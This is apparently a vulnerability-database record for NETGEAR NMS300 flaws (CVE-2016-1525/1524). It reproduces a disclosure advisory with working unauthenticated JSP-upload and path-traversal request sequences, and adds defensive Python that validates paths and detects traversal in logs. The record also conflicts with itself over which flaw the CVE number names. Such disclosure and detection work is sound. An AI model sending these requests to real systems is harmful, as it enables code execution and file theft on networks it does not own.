ID

VAR-201602-0193


CVE

CVE-2016-1525


TITLE

Netgear Management System NMS300 Directory Traversal Vulnerability

Trust: 1.2

sources: CNVD: CNVD-2016-00973 // CNNVD: CNNVD-201602-130

DESCRIPTION

Directory traversal vulnerability in data/config/image.do in NETGEAR Management System NMS300 1.5.0.11 and earlier allows remote authenticated users to read arbitrary files via a .. (dot dot) in the realName parameter. The Netgear Management System NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. Netgear Management System NMS300 1.5.0.11 and prior are vulnerable.

>> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 04/02/2016 / Last updated: 04/02/2016

>> Background on the affected product:
"NMS300 ProSAFE® Network Management System
Diagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network."

>> Summary:
Netgear's NMS300 is a network management utility that runs on Windows systems. It has two serious vulnerabilities that can be exploited by a remote attacker.
A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1].
Two new Metasploit modules that exploit these vulnerabilities have been released.

>> Technical details:

#1
Vulnerability: Remote code execution via arbitrary file upload (unauthenticated)
CVE-2016-1525
Affected versions: NMS300 1.5.0.11, NMS300 1.5.0.2, NMS300 1.4.0.17, NMS300 1.1.0.13

There are two servlets that allow unauthenticated file uploads:

@RequestMapping({ "/fileUpload.do" })
public class FileUpload2Controller - Uses spring file upload

@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" })
public class FileUploadController - Uses flash upload

The JSP file can be uploaded as shown below; it will be named null[name].[extension] and can be reached on http://[host]:8080/null[name].[extension]. So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user.

POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3

------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="name"

[name]
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]"
Content-Type: application/octet-stream

<%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello World Example</title>
</head>
<body>
<h2>A Hello World Example of JSP.</h2>
</body>
</html>
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--

#2
Vulnerability: Arbitrary file download (authenticated)
CVE-2016-1524
Affected versions: NMS300 1.5.0.11, NMS300 1.5.0.2, NMS300 1.4.0.17, NMS300 1.1.0.13

Three steps need to be taken in order to exploit this vulnerability:

a) Add a configuration image, with the realName parameter containing the path traversal to the target file:

POST /data/config/image.do?method=add HTTP/1.1

realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla

b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1):

POST /data/getPage.do?method=getPageList&type=configImgManager

everyPage=10000

Sample response:
{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"}

c) Download the file with the imageId obtained in step 2:

GET /data/config/image.do?method=export&imageId=<ID>

>> Fix:
No fix is currently available. It is recommended not to expose NMS300 to the Internet or any untrusted networks.

>> References:
[1] https://www.kb.cert.org/vuls/id/777024

================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
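The following Python is an added example written for this record; it is not code from the advisory, from NETGEAR, or from NMS300. It shows the two defender-side pieces the CWE-22 weakness above calls for: the containment check a file-serving handler such as image.do should apply to a user-supplied realName (single path component, canonical path must stay under the image directory), and a detection pass over constructed access-log lines that flags traversal in parameters sent to the /data/config/image.do and /data/getPage.do endpoints named in the advisory, then correlates a later method=export request from the same client (step c of the chain). The log format (tab-separated time, client, method, URL, body), the IMAGE_DIR path and all client addresses are assumptions made for the example.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlparse

# Assumed location of stored configuration images (example value, not NMS300's real path).
IMAGE_DIR = "/opt/nms300/images"


def safe_resolve(base_dir: str, real_name: str) -> Optional[str]:
    """Return the absolute path of real_name inside base_dir, or None if the
    name would escape it. This is the validation a handler needs before
    opening a file named by the client (the check image.do lacked)."""
    name = unquote(real_name)  # judge the decoded form, so %2e%2e%2f is not missed
    # A stored image name must be a bare file name: no separators, no dot entries.
    if not name or "/" in name or "\\" in name or name in (".", ".."):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # Canonical containment check (also catches a symlink that points outside base).
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Endpoints from the advisory's file-download chain.
WATCHED_PATHS = ("/data/config/image.do", "/data/getPage.do")
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")

# Constructed sample log lines (tab-separated: time, client, method, URL, body).
# The traversal target "log.txt" is taken from the advisory's own sample response.
SAMPLE_LOG = [
    "2016-02-04T10:00:01Z\t10.0.0.5\tPOST\t/data/config/image.do?method=add\trealName=fw_1.5.img&md5=&fileName=fw_1.5.img&version=1&vendor=Netgear",
    "2016-02-04T10:00:07Z\t10.0.0.9\tPOST\t/data/config/image.do?method=add\trealName=../../../../../../../../../../log.txt&md5=&fileName=imagename.img&version=1337",
    "2016-02-04T10:00:09Z\t10.0.0.9\tPOST\t/data/config/image.do?method=add\trealName=..%2f..%2f..%2flog.txt&fileName=x.img",
    "2016-02-04T10:00:12Z\t10.0.0.9\tGET\t/data/config/image.do?method=export&imageId=7\t-",
    "2016-02-04T10:01:00Z\t10.0.0.5\tGET\t/index.jsp\t-",
]


def _parse(line: str):
    ts, client, method, url, body = line.split("\t")
    parsed = urlparse(url)
    params = parse_qs(parsed.query)
    if body != "-":
        params.update(parse_qs(body))
    return ts, client, method, parsed.path, params


def traversal_hits(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Return (time, client, parameter, decoded value) for every parameter sent to
    a watched endpoint whose value carries a '../' or '..\\' sequence."""
    hits = []
    for line in lines:
        ts, client, _, path, params = _parse(line)
        if path not in WATCHED_PATHS:
            continue
        for key, values in params.items():
            for value in values:
                decoded = unquote(value)  # parse_qs decoded once; unquote again for double encoding
                if TRAVERSAL_RE.search(decoded):
                    hits.append((ts, client, key, decoded))
    return hits


def suspicious_exports(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Second stage: a method=export request (step c) from a client that earlier
    submitted a traversal realName (step a) is the point where the file is read."""
    flagged = {client for _, client, key, _ in traversal_hits(lines) if key == "realName"}
    out = []
    for line in lines:
        ts, client, _, path, params = _parse(line)
        if path == "/data/config/image.do" and params.get("method") == ["export"] and client in flagged:
            out.append((ts, client, params.get("imageId", [""])[0]))
    return out


if __name__ == "__main__":
    for hit in traversal_hits(SAMPLE_LOG):
        print("traversal:", hit)
    for exp in suspicious_exports(SAMPLE_LOG):
        print("export after traversal:", exp)
    print(safe_resolve(IMAGE_DIR, "fw_1.5.img"), safe_resolve(IMAGE_DIR, "../../log.txt"))
```

The containment check rejects the name before any path is built, and the canonical-path comparison is kept as a second layer; the log pass matches on decoded values so URL-encoded traversal is treated the same as the plain form.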

Trust: 3.33

sources: NVD: CVE-2016-1525 // CERT/CC: VU#777024 // JVNDB: JVNDB-2016-001517 // CNVD: CNVD-2016-00973 // BID: 82630 // VULHUB: VHN-90344 // PACKETSTORM: 135618

IOT TAXONOMY

category: Network device; sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2016-00973

AFFECTED PRODUCTS

vendor: netgear; model: prosafe network management software 300; scope: eq; version: 1.5.0.11

Trust: 1.6

vendor: netgear; model: -; scope: -; version: -

Trust: 0.8

vendor: net gear; model: prosafe network management system nms300; scope: lte; version: 1.5.0.11

Trust: 0.8

vendor: netgear; model: management system nms300; scope: lte; version: <=1.5.0.11

Trust: 0.6

sources: CERT/CC: VU#777024 // CNVD: CNVD-2016-00973 // JVNDB: JVNDB-2016-001517 // CNNVD: CNNVD-201602-130 // NVD: CVE-2016-1525

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2016-1525
value: HIGH

Trust: 1.0

NVD: CVE-2016-1525
value: HIGH

Trust: 0.8

CNVD: CNVD-2016-00973
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201602-130
value: HIGH

Trust: 0.6

VULHUB: VHN-90344
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2016-1525
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2016-00973
severity: HIGH
baseScore: 8.3
vectorString: AV:A/AC:L/AU:N/C:C/I:C/A:C
accessVector: ADJACENT_NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 6.5
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-90344
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2016-1525
baseSeverity: HIGH
baseScore: 8.6
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: CHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 3.9
impactScore: 4.0
version: 3.0

Trust: 1.0

sources: CNVD: CNVD-2016-00973 // VULHUB: VHN-90344 // JVNDB: JVNDB-2016-001517 // CNNVD: CNNVD-201602-130 // NVD: CVE-2016-1525

PROBLEMTYPE DATA

problemtype: CWE-22

Trust: 1.9

sources: VULHUB: VHN-90344 // JVNDB: JVNDB-2016-001517 // NVD: CVE-2016-1525

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201602-130

TYPE

path traversal

Trust: 0.6

sources: CNNVD: CNNVD-201602-130

CONFIGURATIONS

sources: JVNDB: JVNDB-2016-001517

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-90344

PATCH

title: NETGEAR Download Center - NMS300; url: http://downloadcenter.netgear.com/en/product/NMS300#searchResults

Trust: 0.8

title: NetgearManagementSystemNMS300 directory traversal vulnerability patch; url: https://www.cnvd.org.cn/patchInfo/show/71361

Trust: 0.6

sources: CNVD: CNVD-2016-00973 // JVNDB: JVNDB-2016-001517

EXTERNAL IDS

db: CERT/CC; id: VU#777024

Trust: 4.3

db: NVD; id: CVE-2016-1525

Trust: 3.5

db: PACKETSTORM; id: 135618

Trust: 1.2

db: PACKETSTORM; id: 135999

Trust: 1.1

db: EXPLOIT-DB; id: 39515

Trust: 1.1

db: EXPLOIT-DB; id: 39412

Trust: 1.1

db: JVN; id: JVNVU96743693

Trust: 0.8

db: JVNDB; id: JVNDB-2016-001517

Trust: 0.8

db: CNNVD; id: CNNVD-201602-130

Trust: 0.7

db: CNVD; id: CNVD-2016-00973

Trust: 0.6

db: BID; id: 82630

Trust: 0.3

db: VULHUB; id: VHN-90344

Trust: 0.1

sources: CERT/CC: VU#777024 // CNVD: CNVD-2016-00973 // VULHUB: VHN-90344 // BID: 82630 // JVNDB: JVNDB-2016-001517 // PACKETSTORM: 135618 // CNNVD: CNNVD-201602-130 // NVD: CVE-2016-1525

REFERENCES

url:http://www.kb.cert.org/vuls/id/777024

Trust: 3.5

url:http://seclists.org/fulldisclosure/2016/feb/30

Trust: 3.3

url:http://downloadcenter.netgear.com/en/product/nms300#

Trust: 1.7

url:http://www.securityfocus.com/archive/1/537446/100/0/threaded

Trust: 1.1

url:https://www.exploit-db.com/exploits/39412/

Trust: 1.1

url:https://www.exploit-db.com/exploits/39515/

Trust: 1.1

url:http://packetstormsecurity.com/files/135618/netgear-pro-nms-300-code-execution-file-download.html

Trust: 1.1

url:http://packetstormsecurity.com/files/135999/netgear-prosafe-network-management-system-300-arbitrary-file-upload.html

Trust: 1.1

url:http://www.rapid7.com/db/modules/exploit/windows/http/netgear_nms_rce

Trust: 1.1

url:https://cwe.mitre.org/data/definitions/434.html

Trust: 0.8

url:https://cwe.mitre.org/data/definitions/22.html

Trust: 0.8

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1525

Trust: 0.8

url:http://jvn.jp/vu/jvnvu96743693/

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1525

Trust: 0.8

url:http://www.netgear.com

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2016-1525

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2016-1524

Trust: 0.1

url:http://www.agileinfosec.co.uk/

Trust: 0.1

sources: CERT/CC: VU#777024 // CNVD: CNVD-2016-00973 // VULHUB: VHN-90344 // BID: 82630 // JVNDB: JVNDB-2016-001517 // PACKETSTORM: 135618 // CNNVD: CNNVD-201602-130 // NVD: CVE-2016-1525

CREDITS

Pedro Ribeiro of Agile Information Security.

Trust: 0.3

sources: BID: 82630

SOURCES

db: CERT/CC; id: VU#777024
db: CNVD; id: CNVD-2016-00973
db: VULHUB; id: VHN-90344
db: BID; id: 82630
db: JVNDB; id: JVNDB-2016-001517
db: PACKETSTORM; id: 135618
db: CNNVD; id: CNNVD-201602-130
db: NVD; id: CVE-2016-1525

LAST UPDATE DATE

2024-11-23T22:52:41.660000+00:00


SOURCES UPDATE DATE

db: CERT/CC; id: VU#777024; date: 2016-02-04T00:00:00
db: CNVD; id: CNVD-2016-00973; date: 2016-02-16T00:00:00
db: VULHUB; id: VHN-90344; date: 2018-10-09T00:00:00
db: BID; id: 82630; date: 2016-07-05T21:22:00
db: JVNDB; id: JVNDB-2016-001517; date: 2016-02-29T00:00:00
db: CNNVD; id: CNNVD-201602-130; date: 2016-03-01T00:00:00
db: NVD; id: CVE-2016-1525; date: 2024-11-21T02:46:36.153

SOURCES RELEASE DATE

db: CERT/CC; id: VU#777024; date: 2016-02-03T00:00:00
db: CNVD; id: CNVD-2016-00973; date: 2016-02-16T00:00:00
db: VULHUB; id: VHN-90344; date: 2016-02-13T00:00:00
db: BID; id: 82630; date: 2016-02-03T00:00:00
db: JVNDB; id: JVNDB-2016-001517; date: 2016-02-29T00:00:00
db: PACKETSTORM; id: 135618; date: 2016-02-07T17:10:18
db: CNNVD; id: CNNVD-201602-130; date: 2016-02-04T00:00:00
db: NVD; id: CVE-2016-1525; date: 2016-02-13T02:59:10.900